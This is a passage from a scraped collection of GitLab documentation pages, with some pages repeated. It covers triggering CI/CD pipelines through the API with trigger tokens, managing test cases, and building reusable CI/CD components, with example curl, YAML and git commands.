a webhook URL like the following for push and tag events: ```plaintext https://gitlab.example.com/api/v4/projects/<project_id>/ref/<ref_name>/trigger/pipeline?token=<token> ``` Replace: - The URL with `https://gitlab.com` or the URL of your instance. - `<project_id>` with your project ID, like `123456`. The project ID is displayed on the [project overview page](../../user/project/working_with_projects.md#find-the-project-id). - `<ref_name>` with a branch or tag name, like `main`. This value takes precedence over the `ref_name` in the webhook payload. The payload's `ref` is the branch that fired the trigger in the source repository. You must URL-encode the `ref_name` if it contains slashes. - `<token>` with your pipeline trigger token. #### Access webhook payload If you trigger a pipeline by using a webhook, you can access the webhook payload with the `TRIGGER_PAYLOAD` [predefined CI/CD variable](../variables/predefined_variables.md). The payload is exposed as a [file-type variable](../variables/_index.md#use-file-type-cicd-variables), so you can access the data with `cat $TRIGGER_PAYLOAD` or a similar command. ### Pass CI/CD variables in the API call You can pass any number of [CI/CD variables](../variables/_index.md) in the trigger API call, though [using inputs to control pipeline behavior](#pass-pipeline-inputs-in-the-api-call) offers improved security and flexibility over CI/CD variables. These variables have the [highest precedence](../variables/_index.md#cicd-variable-precedence), and override all variables with the same name. The parameter is of the form `variables[key]=value`, for example: ```shell curl --request POST \ --form token=TOKEN \ --form ref=main \ --form "variables[UPLOAD_TO_S3]=true" \ "https://gitlab.example.com/api/v4/projects/123456/trigger/pipeline" ``` CI/CD variables in triggered pipelines display on each job's page, but only users with the Owner and Maintainer role can view the values. ![A configuration panel for a CI trigger for token 4e19 showing UPLOAD_TO_CI set to true](img/trigger_variables_v11_6.png) Using inputs to control pipeline behavior offers improved security and flexibility over CI/CD variables. ### Pass pipeline inputs in the API call You can pass pipeline inputs in the trigger API call. [Inputs](../inputs/_index.md) provide a structured way to parameterize your pipelines with built-in validation and documentation. The parameter format is `inputs[name]=value`, for example: ```shell curl --request POST \ --form token=TOKEN \ --form ref=main \ --form "inputs[environment]=production" \ "https://gitlab.example.com/api/v4/projects/123456/trigger/pipeline" ``` Input values are validated according to the type and constraints defined in your pipeline's `spec:inputs` section: ```yaml spec: inputs: environment: type: string description: "Deployment environment" options: [dev, staging, production] default: dev ``` ## Revoke a pipeline trigger token To revoke a pipeline trigger token: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Settings > CI/CD**. 1. Expand **Pipeline triggers**. 1. To the left of the trigger token you want to revoke, select **Revoke** ({{< icon name="remove" >}}). A revoked trigger token cannot be added back. ## Configure CI/CD jobs to run in triggered pipelines To [configure when to run jobs](../jobs/job_control.md) in triggered pipelines, you can: - Use [`rules`](../yaml/_index.md#rules) with the `$CI_PIPELINE_SOURCE` [predefined CI/CD variable](../variables/predefined_variables.md). - Use [`only`/`except`](../yaml/deprecated_keywords.md#onlyrefs--exceptrefs) keywords, though `rules` is the preferred keyword. | `$CI_PIPELINE_SOURCE` value | `only`/`except` keywords | Trigger method | |-----------------------------|--------------------------|---------------------| | `trigger` | `triggers` | In pipelines triggered with the [pipeline triggers API](../../api/pipeline_triggers.md) by using a [trigger token](#create-a-pipeline-trigger-token). | | `pipeline` | `pipelines` | In [multi-project pipelines](../pipelines/downstream_pipelines.md#trigger-a-multi-project-pipeline-by-using-the-api) triggered with the [pipeline triggers API](../../api/pipeline_triggers.md) by using the [`$CI_JOB_TOKEN`](../jobs/ci_job_token.md), or by using the [`trigger`](../yaml/_index.md#trigger) keyword in the CI/CD configuration file. | Additionally, the `$CI_PIPELINE_TRIGGERED` predefined CI/CD variable is set to `true` in pipelines triggered with a pipeline trigger token. ## See which pipeline trigger token was used You can see which pipeline trigger token caused a job to run by visiting the single job page. A part of the trigger token displays on the right sidebar, under **Job details**. In pipelines triggered with a trigger token, jobs are labeled as `triggered` in **Build > Jobs**. ## Troubleshooting ### `403 Forbidden` when you trigger a pipeline with a webhook When you trigger a pipeline with a webhook, the API might return a `{"message":"403 Forbidden"}` response. To avoid trigger loops, do not use [pipeline events](../../user/project/integrations/webhook_events.md#pipeline-events) to trigger pipelines. ### `404 Not Found` when triggering a pipeline A response of `{"message":"404 Not Found"}` when triggering a pipeline might be caused by using a [personal access token](../../user/profile/personal_access_tokens.md) instead of a pipeline trigger token. [Create a new trigger token](#create-a-pipeline-trigger-token) and use it instead of the personal access token. A response of `{"message":"404 Not Found"}` when triggering a pipeline might also be caused by using a `GET` request. Pipelines can only be triggered using a `POST` request. ### `The requested URL returned error: 400` when triggering a pipeline If you attempt to trigger a pipeline by using a `ref` that is a branch name that doesn't exist, GitLab returns `The requested URL returned error: 400`. For example, you might accidentally use `main` for the branch name in a project that uses a different branch name for its default branch. Another possible cause for this error is a rule that prevents creation of the pipelines when `CI_PIPELINE_SOURCE` value is `trigger`, such as: ```yaml rules: - if: $CI_PIPELINE_SOURCE == "trigger" when: never ``` Review your [`workflow:rules`](../yaml/_index.md#workflowrules) to ensure a pipeline can be created when `CI_PIPELINE_SOURCE` value is `trigger`.
--- stage: Verify group: Pipeline Authoring info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Trigger pipelines with the API breadcrumbs: - doc - ci - triggers --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} To trigger a pipeline for a specific branch or tag, you can use an API call to the [pipeline triggers API endpoint](../../api/pipeline_triggers.md). If you are [migrating to GitLab CI/CD](../migration/plan_a_migration.md), you can trigger GitLab CI/CD pipelines by calling the API endpoint from the other provider's jobs. For example, as part of a migration from [Jenkins](../migration/jenkins.md) or [CircleCI](../migration/circleci.md). When authenticating with the API, you can use: - A [pipeline trigger token](#create-a-pipeline-trigger-token) to trigger a branch or tag pipeline with the [pipeline triggers API endpoint](../../api/pipeline_triggers.md). - A [CI/CD job token](../jobs/ci_job_token.md) to [trigger a multi-project pipeline](../pipelines/downstream_pipelines.md#trigger-a-multi-project-pipeline-by-using-the-api). - Another [token with API access](../../security/tokens/_index.md) to create a new pipeline with the [project pipeline API endpoint](../../api/pipelines.md#create-a-new-pipeline). ## Create a pipeline trigger token You can trigger a pipeline for a branch or tag by generating a pipeline trigger token and using it to authenticate an API call. The token impersonates a user's project access and permissions. Prerequisites: - You must have at least the Maintainer role for the project. To create a trigger token: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Settings > CI/CD**. 1. Expand **Pipeline trigger tokens**. 1. Select **Add new token** 1. Enter a description and select **Create pipeline trigger token**. - You can view and copy the full token for all triggers you have created. - You can only see the first 4 characters for tokens created by other project members. {{< alert type="warning" >}} It is a security risk to save tokens in plain text in public projects, or store them in a way that malicious users could access them. A leaked trigger token could be used to force an unscheduled deployment, attempt to access CI/CD variables, or other malicious uses. [Masked CI/CD variables](../variables/_index.md#mask-a-cicd-variable) help improve the security of trigger tokens. For more information about keeping tokens secure, see the [security considerations](../../security/tokens/_index.md#security-considerations). {{< /alert >}} ## Trigger a pipeline After you [create a pipeline trigger token](#create-a-pipeline-trigger-token), you can use it to trigger pipelines with a tool that can access the API, or a webhook. ### Use cURL You can use cURL to trigger pipelines with the [pipeline triggers API endpoint](../../api/pipeline_triggers.md). For example: - Use a multiline cURL command: ```shell curl --request POST \ --form token=<token> \ --form ref=<ref_name> \ "https://gitlab.example.com/api/v4/projects/<project_id>/trigger/pipeline" ``` - Use cURL and pass the `<token>` and `<ref_name>` in the query string: ```shell curl --request POST \ "https://gitlab.example.com/api/v4/projects/<project_id>/trigger/pipeline?token=<token>&ref=<ref_name>" ``` In each example, replace: - The URL with `https://gitlab.com` or the URL of your instance. - `<token>` with your trigger token. - `<ref_name>` with a branch or tag name, like `main`. - `<project_id>` with your project ID, like `123456`. The project ID is displayed on the [project overview page](../../user/project/working_with_projects.md#find-the-project-id). ### Use a CI/CD job You can use a CI/CD job with a pipeline trigger token to trigger pipelines when another pipeline runs. For example, to trigger a pipeline on the `main` branch of `project-B` when a tag is created in `project-A`, add the following job to project A's `.gitlab-ci.yml` file: ```yaml trigger_pipeline: stage: deploy script: - 'curl --fail --request POST --form token=$MY_TRIGGER_TOKEN --form ref=main "${CI_API_V4_URL}/projects/123456/trigger/pipeline"' rules: - if: $CI_COMMIT_TAG environment: production ``` In this example: - `1234` is the project ID for `project-B`. The project ID is displayed on the [project overview page](../../user/project/working_with_projects.md#find-the-project-id). - The [`rules`](../yaml/_index.md#rules) cause the job to run every time a tag is added to `project-A`. - `MY_TRIGGER_TOKEN` is a [masked CI/CD variable](../variables/_index.md#mask-a-cicd-variable) that contains the trigger token. ### Use a webhook To trigger a pipeline from another project's webhook, use a webhook URL like the following for push and tag events: ```plaintext https://gitlab.example.com/api/v4/projects/<project_id>/ref/<ref_name>/trigger/pipeline?token=<token> ``` Replace: - The URL with `https://gitlab.com` or the URL of your instance. - `<project_id>` with your project ID, like `123456`. The project ID is displayed on the [project overview page](../../user/project/working_with_projects.md#find-the-project-id). - `<ref_name>` with a branch or tag name, like `main`. This value takes precedence over the `ref_name` in the webhook payload. The payload's `ref` is the branch that fired the trigger in the source repository. You must URL-encode the `ref_name` if it contains slashes. - `<token>` with your pipeline trigger token. #### Access webhook payload If you trigger a pipeline by using a webhook, you can access the webhook payload with the `TRIGGER_PAYLOAD` [predefined CI/CD variable](../variables/predefined_variables.md). The payload is exposed as a [file-type variable](../variables/_index.md#use-file-type-cicd-variables), so you can access the data with `cat $TRIGGER_PAYLOAD` or a similar command. ### Pass CI/CD variables in the API call You can pass any number of [CI/CD variables](../variables/_index.md) in the trigger API call, though [using inputs to control pipeline behavior](#pass-pipeline-inputs-in-the-api-call) offers improved security and flexibility over CI/CD variables. These variables have the [highest precedence](../variables/_index.md#cicd-variable-precedence), and override all variables with the same name. The parameter is of the form `variables[key]=value`, for example: ```shell curl --request POST \ --form token=TOKEN \ --form ref=main \ --form "variables[UPLOAD_TO_S3]=true" \ "https://gitlab.example.com/api/v4/projects/123456/trigger/pipeline" ``` CI/CD variables in triggered pipelines display on each job's page, but only users with the Owner and Maintainer role can view the values. ![A configuration panel for a CI trigger for token 4e19 showing UPLOAD_TO_CI set to true](img/trigger_variables_v11_6.png) Using inputs to control pipeline behavior offers improved security and flexibility over CI/CD variables. ### Pass pipeline inputs in the API call You can pass pipeline inputs in the trigger API call. [Inputs](../inputs/_index.md) provide a structured way to parameterize your pipelines with built-in validation and documentation. The parameter format is `inputs[name]=value`, for example: ```shell curl --request POST \ --form token=TOKEN \ --form ref=main \ --form "inputs[environment]=production" \ "https://gitlab.example.com/api/v4/projects/123456/trigger/pipeline" ``` Input values are validated according to the type and constraints defined in your pipeline's `spec:inputs` section: ```yaml spec: inputs: environment: type: string description: "Deployment environment" options: [dev, staging, production] default: dev ``` ## Revoke a pipeline trigger token To revoke a pipeline trigger token: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Settings > CI/CD**. 1. Expand **Pipeline triggers**. 1. To the left of the trigger token you want to revoke, select **Revoke** ({{< icon name="remove" >}}). A revoked trigger token cannot be added back. ## Configure CI/CD jobs to run in triggered pipelines To [configure when to run jobs](../jobs/job_control.md) in triggered pipelines, you can: - Use [`rules`](../yaml/_index.md#rules) with the `$CI_PIPELINE_SOURCE` [predefined CI/CD variable](../variables/predefined_variables.md). - Use [`only`/`except`](../yaml/deprecated_keywords.md#onlyrefs--exceptrefs) keywords, though `rules` is the preferred keyword. | `$CI_PIPELINE_SOURCE` value | `only`/`except` keywords | Trigger method | |-----------------------------|--------------------------|---------------------| | `trigger` | `triggers` | In pipelines triggered with the [pipeline triggers API](../../api/pipeline_triggers.md) by using a [trigger token](#create-a-pipeline-trigger-token). | | `pipeline` | `pipelines` | In [multi-project pipelines](../pipelines/downstream_pipelines.md#trigger-a-multi-project-pipeline-by-using-the-api) triggered with the [pipeline triggers API](../../api/pipeline_triggers.md) by using the [`$CI_JOB_TOKEN`](../jobs/ci_job_token.md), or by using the [`trigger`](../yaml/_index.md#trigger) keyword in the CI/CD configuration file. | Additionally, the `$CI_PIPELINE_TRIGGERED` predefined CI/CD variable is set to `true` in pipelines triggered with a pipeline trigger token. ## See which pipeline trigger token was used You can see which pipeline trigger token caused a job to run by visiting the single job page. A part of the trigger token displays on the right sidebar, under **Job details**. In pipelines triggered with a trigger token, jobs are labeled as `triggered` in **Build > Jobs**. ## Troubleshooting ### `403 Forbidden` when you trigger a pipeline with a webhook When you trigger a pipeline with a webhook, the API might return a `{"message":"403 Forbidden"}` response. To avoid trigger loops, do not use [pipeline events](../../user/project/integrations/webhook_events.md#pipeline-events) to trigger pipelines. ### `404 Not Found` when triggering a pipeline A response of `{"message":"404 Not Found"}` when triggering a pipeline might be caused by using a [personal access token](../../user/profile/personal_access_tokens.md) instead of a pipeline trigger token. [Create a new trigger token](#create-a-pipeline-trigger-token) and use it instead of the personal access token. A response of `{"message":"404 Not Found"}` when triggering a pipeline might also be caused by using a `GET` request. Pipelines can only be triggered using a `POST` request. ### `The requested URL returned error: 400` when triggering a pipeline If you attempt to trigger a pipeline by using a `ref` that is a branch name that doesn't exist, GitLab returns `The requested URL returned error: 400`. For example, you might accidentally use `main` for the branch name in a project that uses a different branch name for its default branch. Another possible cause for this error is a rule that prevents creation of the pipelines when `CI_PIPELINE_SOURCE` value is `trigger`, such as: ```yaml rules: - if: $CI_PIPELINE_SOURCE == "trigger" when: never ``` Review your [`workflow:rules`](../yaml/_index.md#workflowrules) to ensure a pipeline can be created when `CI_PIPELINE_SOURCE` value is `trigger`.
https://docs.gitlab.com/ci/test_cases
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/_index.md
2025-08-13
doc/ci/test_cases
[ "doc", "ci", "test_cases" ]
_index.md
Plan
Product Planning
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Test cases
Test cases in GitLab can help your teams create testing scenarios in their existing development platform.
{{< details >}} - Tier: Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Test cases integrate test planning directly into your GitLab workflows. Teams can: - Document test scenarios in the same platform where they manage code. - Track test requirements alongside development tasks. - Share test plans across implementation and testing teams. - Manage test case visibility with confidential settings. - Archive and reopen test cases as needed. Teams use test cases to streamline collaboration between development and testing teams, which eliminates the need for external test planning tools. <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> To learn how to use issues and epics to manage your requirements and testing needs while integrating with your development workflows, see [Streamline Software Development: Integrating Requirements, Testing, and Development Workflows](https://www.youtube.com/watch?v=wbfWM4y2VmM). <!-- Video published on 2024-02-21 --> ## Create a test case {{< history >}} - [Changed](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/169256) the minimum user role from Reporter to Planner in GitLab 17.7. {{< /history >}} Prerequisites: - You must have at least the Planner role. To create a test case in a GitLab project: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Build > Test cases**. 1. Select **New test case**. You are taken to the new test case form. Here you can enter the new case's title, [description](../../user/markdown.md), attach a file, and assign [labels](../../user/project/labels.md). 1. Select **Submit test case**. You are taken to view the new test case. ## View a test case You can view all test cases in the project in the test cases list. Filter the issue list with a search query, including labels or the test case's title. Prerequisites: - Non-confidential test case in a public project: You don't have to be a member of the project. - Non-confidential test case in a private project: You must have at least the Guest role for the project. - Confidential test case (regardless of project visibility): You must have at least the Planner role for the project. To view a test case: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Build > Test cases**. 1. Select the title of the test case you want to view. You are taken to the test case page. ![An example test case page](img/test_case_show_v13_10.png) ## Edit a test case {{< history >}} - [Changed](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/169256) the minimum user role from Reporter to Planner in GitLab 17.7. {{< /history >}} You can edit a test case's title and description. Prerequisites: - You must have at least the Planner role. - Users demoted to the Guest role can continue to edit the test cases they created when they were in the higher role. To edit a test case: 1. [View a test case](#view-a-test-case). 1. Select **Edit title and description** ({{< icon name="pencil" >}}). 1. Edit the test case's title or description. 1. Select **Save changes**. ## Make a test case confidential {{< history >}} - Introduced for [new](https://gitlab.com/gitlab-org/gitlab/-/issues/422121) and [existing](https://gitlab.com/gitlab-org/gitlab/-/issues/422120) test cases in GitLab 16.5. - [Changed](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/169256) the minimum user role from Reporter to Planner in GitLab 17.7. {{< /history >}} If you're working on a test case that contains private information, you can make it confidential. Prerequisites: - You must have at least the Planner role. To make a test case confidential: - When you [create a test case](#create-a-test-case): under **Confidentiality**, select the **This test case is confidential** checkbox. - When you [edit a test case](#edit-a-test-case): on the right sidebar, next to **Confidentiality**, select **Edit**, then select **Turn on**. You can also use the `/confidential` [quick action](../../user/project/quick_actions.md) when both creating a new test case or editing an existing one. ## Archive a test case {{< history >}} - [Changed](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/169256) the minimum user role from Reporter to Planner in GitLab 17.7. {{< /history >}} When you want to stop using a test case, you can archive it. You can [reopen an archived test case](#reopen-an-archived-test-case) later. Prerequisites: - You must have at least the Planner role. To archive a test case, on the test case's page, select **Archive test case**. To view archived test cases: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Build > Test cases**. 1. Select **Archived**. ## Reopen an archived test case {{< history >}} - [Changed](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/169256) the minimum user role from Reporter to Planner in GitLab 17.7. {{< /history >}} If you decide to start using an archived test case again, you can reopen it. Prerequisites: - You must have at least the Planner role. To reopen an archived test case: 1. [View a test case](#view-a-test-case). 1. Select **Reopen test case**.
--- stage: Plan group: Product Planning info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments description: Test cases in GitLab can help your teams create testing scenarios in their existing development platform. title: Test cases breadcrumbs: - doc - ci - test_cases --- {{< details >}} - Tier: Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Test cases integrate test planning directly into your GitLab workflows. Teams can: - Document test scenarios in the same platform where they manage code. - Track test requirements alongside development tasks. - Share test plans across implementation and testing teams. - Manage test case visibility with confidential settings. - Archive and reopen test cases as needed. Teams use test cases to streamline collaboration between development and testing teams, which eliminates the need for external test planning tools. <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> To learn how to use issues and epics to manage your requirements and testing needs while integrating with your development workflows, see [Streamline Software Development: Integrating Requirements, Testing, and Development Workflows](https://www.youtube.com/watch?v=wbfWM4y2VmM). <!-- Video published on 2024-02-21 --> ## Create a test case {{< history >}} - [Changed](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/169256) the minimum user role from Reporter to Planner in GitLab 17.7. {{< /history >}} Prerequisites: - You must have at least the Planner role. To create a test case in a GitLab project: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Build > Test cases**. 1. Select **New test case**. You are taken to the new test case form. Here you can enter the new case's title, [description](../../user/markdown.md), attach a file, and assign [labels](../../user/project/labels.md). 1. Select **Submit test case**. You are taken to view the new test case. ## View a test case You can view all test cases in the project in the test cases list. Filter the issue list with a search query, including labels or the test case's title. Prerequisites: - Non-confidential test case in a public project: You don't have to be a member of the project. - Non-confidential test case in a private project: You must have at least the Guest role for the project. - Confidential test case (regardless of project visibility): You must have at least the Planner role for the project. To view a test case: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Build > Test cases**. 1. Select the title of the test case you want to view. You are taken to the test case page. ![An example test case page](img/test_case_show_v13_10.png) ## Edit a test case {{< history >}} - [Changed](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/169256) the minimum user role from Reporter to Planner in GitLab 17.7. {{< /history >}} You can edit a test case's title and description. Prerequisites: - You must have at least the Planner role. - Users demoted to the Guest role can continue to edit the test cases they created when they were in the higher role. To edit a test case: 1. [View a test case](#view-a-test-case). 1. Select **Edit title and description** ({{< icon name="pencil" >}}). 1. Edit the test case's title or description. 1. Select **Save changes**. ## Make a test case confidential {{< history >}} - Introduced for [new](https://gitlab.com/gitlab-org/gitlab/-/issues/422121) and [existing](https://gitlab.com/gitlab-org/gitlab/-/issues/422120) test cases in GitLab 16.5. - [Changed](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/169256) the minimum user role from Reporter to Planner in GitLab 17.7. {{< /history >}} If you're working on a test case that contains private information, you can make it confidential. Prerequisites: - You must have at least the Planner role. To make a test case confidential: - When you [create a test case](#create-a-test-case): under **Confidentiality**, select the **This test case is confidential** checkbox. - When you [edit a test case](#edit-a-test-case): on the right sidebar, next to **Confidentiality**, select **Edit**, then select **Turn on**. You can also use the `/confidential` [quick action](../../user/project/quick_actions.md) when both creating a new test case or editing an existing one. ## Archive a test case {{< history >}} - [Changed](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/169256) the minimum user role from Reporter to Planner in GitLab 17.7. {{< /history >}} When you want to stop using a test case, you can archive it. You can [reopen an archived test case](#reopen-an-archived-test-case) later. Prerequisites: - You must have at least the Planner role. To archive a test case, on the test case's page, select **Archive test case**. To view archived test cases: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Build > Test cases**. 1. Select **Archived**. ## Reopen an archived test case {{< history >}} - [Changed](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/169256) the minimum user role from Reporter to Planner in GitLab 17.7. {{< /history >}} If you decide to start using an archived test case again, you can reopen it. Prerequisites: - You must have at least the Planner role. To reopen an archived test case: 1. [View a test case](#view-a-test-case). 1. Select **Reopen test case**.
https://docs.gitlab.com/ci/examples
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/examples.md
2025-08-13
doc/ci/components
[ "doc", "ci", "components" ]
examples.md
Verify
Pipeline Authoring
This page is maintained by Developer Relations, author @dnsmichi, see https://handbook.gitlab.com/handbook/marketing/developer-relations/developer-advocacy/content/#maintained-documentation
CI/CD component examples
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} ## Test a component Depending on a component's functionality, [testing the component](_index.md#test-the-component) might require additional files in the repository. For example, a component which lints, builds, and tests software in a specific programming language requires actual source code samples. You can have source code examples, configuration files, and similar in the same repository. For example, the Code Quality CI/CD component's has several [code samples for testing](https://gitlab.com/components/code-quality/-/tree/main/src). ### Example: Test a Rust language CI/CD component Depending on a component's functionality, [testing the component](_index.md#test-the-component) might require additional files in the repository. The following "hello world" example for the Rust programming language uses the `cargo` tool chain for simplicity: 1. Go to the CI/CD component root directory. 1. Initialize a new Rust project by using the `cargo init` command. ```shell cargo init ``` The command creates all required project files, including a `src/main.rs` "hello world" example. This step is sufficient to build the Rust source code in a component job with `cargo build`. ```plaintext tree . ├── Cargo.toml ├── LICENSE.md ├── README.md ├── src │ └── main.rs └── templates └── build.yml ``` 1. Ensure that the component has a job to build the Rust source code, for example, in `templates/build.yml`: ```yaml spec: inputs: stage: default: build description: 'Defines the build stage' rust_version: default: latest description: 'Specify the Rust version, use values from https://hub.docker.com/_/rust/tags Defaults to latest' --- "build-$[[ inputs.rust_version ]]": stage: $[[ inputs.stage ]] image: rust:$[[ inputs.rust_version ]] script: - cargo build --verbose ``` In this example: - The `stage` and `rust_version` inputs can be modified from their default values. The CI/CD job starts with a `build-` prefix and dynamically creates the name based on the `rust_version` input. The command `cargo build --verbose` compiles the Rust source code. 1. Test the component's `build` template in the project's `.gitlab-ci.yml` configuration file: ```yaml include: # include the component located in the current project from the current SHA - component: $CI_SERVER_FQDN/$CI_PROJECT_PATH/build@$CI_COMMIT_SHA inputs: stage: build stages: [build, test, release] ``` 1. For running tests and more, add additional functions and tests into the Rust code, and add a component template and job running `cargo test` in `templates/test.yml`. ```yaml spec: inputs: stage: default: test description: 'Defines the test stage' rust_version: default: latest description: 'Specify the Rust version, use values from https://hub.docker.com/_/rust/tags Defaults to latest' --- "test-$[[ inputs.rust_version ]]": stage: $[[ inputs.stage ]] image: rust:$[[ inputs.rust_version ]] script: - cargo test --verbose ``` 1. Test the additional job in the pipeline by including the `test` component template: ```yaml include: # include the component located in the current project from the current SHA - component: $CI_SERVER_FQDN/$CI_PROJECT_PATH/build@$CI_COMMIT_SHA inputs: stage: build - component: $CI_SERVER_FQDN/$CI_PROJECT_PATH/test@$CI_COMMIT_SHA inputs: stage: test stages: [build, test, release] ``` ## CI/CD component patterns This section provides practical examples of implementing common patterns in CI/CD components. ### Use boolean inputs to conditionally configure jobs You can compose jobs with two conditionals by combining `boolean` type inputs and [`extends`](../yaml/_index.md#extends) functionality. For example, to configure complex caching behavior with a `boolean` input: ```yaml spec: inputs: enable_special_caching: description: 'If set to `true` configures a complex caching behavior' type: boolean --- .my-component:enable_special_caching:false: extends: null .my-component:enable_special_caching:true: cache: policy: pull-push key: $CI_COMMIT_SHA paths: [...] my-job: extends: '.my-component:enable_special_caching:$[[ inputs.enable_special_caching ]]' script: ... # run some fancy tooling ``` This pattern works by passing the `enable_special_caching` input into the `extends` keyword of the job. Depending on whether `enable_special_caching` is `true` or `false`, the appropriate configuration is selected from the predefined hidden jobs (`.my-component:enable_special_caching:true` or `.my-component:enable_special_caching:false`). ### Use `options` to conditionally configure jobs You can compose jobs with multiple options, for behavior similar to `if` and `elseif` conditionals. Use the [`extends`](../yaml/_index.md#extends) with `string` type and multiple `options` for any number of conditions. For example, to configure complex caching behavior with 3 different options: ```yaml spec: inputs: cache_mode: description: Defines the caching mode to use for this component type: string options: - default - aggressive - relaxed --- .my-component:cache_mode:default: extends: null .my-component:cache_mode:aggressive: cache: policy: push key: $CI_COMMIT_SHA paths: ['*/**'] .my-component:cache_mode:relaxed: cache: policy: pull-push key: $CI_COMMIT_BRANCH paths: ['bin/*'] my-job: extends: '.my-component:cache_mode:$[[ inputs.cache_mode ]]' script: ... # run some fancy tooling ``` In this example, `cache_mode` input offers `default`, `aggressive`, and `relaxed` options, each corresponding to a different hidden job. By extending the component job with `extends: '.my-component:cache_mode:$[[ inputs.cache_mode ]]'`, the job dynamically inherits the correct caching configuration based on the selected option. ## CI/CD component migration examples This section shows practical examples of migrating CI/CD templates and pipeline configuration into reusable CI/CD components. ### CI/CD component migration example: Go A complete pipeline for the software development lifecycle can be composed with multiple jobs and stages. CI/CD templates for programming languages may provide multiple jobs in a single template file. As a practice, the following Go CI/CD template should be migrated. ```yaml default: image: golang:latest stages: - test - build - deploy format: stage: test script: - go fmt $(go list ./... | grep -v /vendor/) - go vet $(go list ./... | grep -v /vendor/) - go test -race $(go list ./... | grep -v /vendor/) compile: stage: build script: - mkdir -p mybinaries - go build -o mybinaries ./... artifacts: paths: - mybinaries ``` {{< alert type="note" >}} For a more incremental approach, migrate one job at a time. Start with the `build` job, then repeat the steps for the `format` and `test` jobs. {{< /alert >}} The CI/CD template migration involves the following steps: 1. Analyze the CI/CD jobs and dependencies, and define migration actions: - The `image` configuration is global, [needs to be moved into the job definitions](_index.md#avoid-using-global-keywords). - The `format` job runs multiple `go` commands in one job. The `go test` command should be moved into a separate job to increase pipeline efficiency. - The `compile` job runs `go build` and should be renamed to `build`. 1. Define optimization strategies for better pipeline efficiency. - The `stage` job attribute should be configurable to allow different CI/CD pipeline consumers. - The `image` key uses a hardcoded image tag `latest`. Add [`golang_version` as input](../inputs/_index.md) with `latest` as default value for more flexible and reusable pipelines. The input must match the Docker Hub image tag values. - The `compile` job builds the binaries into a hard-coded target directory `mybinaries`, which can be enhanced with a dynamic [input](../inputs/_index.md) and default value `mybinaries`. 1. Create a template [directory structure](_index.md#directory-structure) for the new component, based on one template for each job. - The name of the template should follow the `go` command, for example `format.yml`, `build.yml`, and `test.yml`. - Create a new project, initialize a Git repository, add/commit all changes, set a remote origin and push. Modify the URL for your CI/CD component project path. - Create additional files as outlined in the guidance to [write a component](_index.md#write-a-component): `README.md`, `LICENSE.md`, `.gitlab-ci.yml`, `.gitignore`. The following shell commands initialize the Go component structure: ```shell git init mkdir templates touch templates/{format,build,test}.yml touch README.md LICENSE.md .gitlab-ci.yml .gitignore git add -A git commit -avm "Initial component structure" git remote add origin https://gitlab.example.com/components/golang.git git push ``` 1. Create the CI/CD jobs as template. Start with the `build` job. - Define the following inputs in the `spec` section: `stage`, `golang_version` and `binary_directory`. - Add a dynamic job name definition, accessing `inputs.golang_version`. - Use the similar pattern for dynamic Go image versions, accessing `inputs.golang_version`. - Assign the stage to the `inputs.stage` value. - Create the binary director from `inputs.binary_directory` and add it as parameter to `go build`. - Define the artifacts path to `inputs.binary_directory`. ```yaml spec: inputs: stage: default: 'build' description: 'Defines the build stage' golang_version: default: 'latest' description: 'Go image version tag' binary_directory: default: 'mybinaries' description: 'Output directory for created binary artifacts' --- "build-$[[ inputs.golang_version ]]": image: golang:$[[ inputs.golang_version ]] stage: $[[ inputs.stage ]] script: - mkdir -p $[[ inputs.binary_directory ]] - go build -o $[[ inputs.binary_directory ]] ./... artifacts: paths: - $[[ inputs.binary_directory ]] ``` - The `format` job template follows the same patterns, but only requires the `stage` and `golang_version` inputs. ```yaml spec: inputs: stage: default: 'format' description: 'Defines the format stage' golang_version: default: 'latest' description: 'Golang image version tag' --- "format-$[[ inputs.golang_version ]]": image: golang:$[[ inputs.golang_version ]] stage: $[[ inputs.stage ]] script: - go fmt $(go list ./... | grep -v /vendor/) - go vet $(go list ./... | grep -v /vendor/) ``` - The `test` job template follows the same patterns, but only requires the `stage` and `golang_version` inputs. ```yaml spec: inputs: stage: default: 'test' description: 'Defines the format stage' golang_version: default: 'latest' description: 'Golang image version tag' --- "test-$[[ inputs.golang_version ]]": image: golang:$[[ inputs.golang_version ]] stage: $[[ inputs.stage ]] script: - go test -race $(go list ./... | grep -v /vendor/) ``` 1. In order to test the component, modify the `.gitlab-ci.yml` configuration file, and add [tests](_index.md#test-the-component). - Specify a different value for `golang_version` as input for the `build` job. - Modify the URL for your CI/CD component path. ```yaml stages: [format, build, test] include: - component: 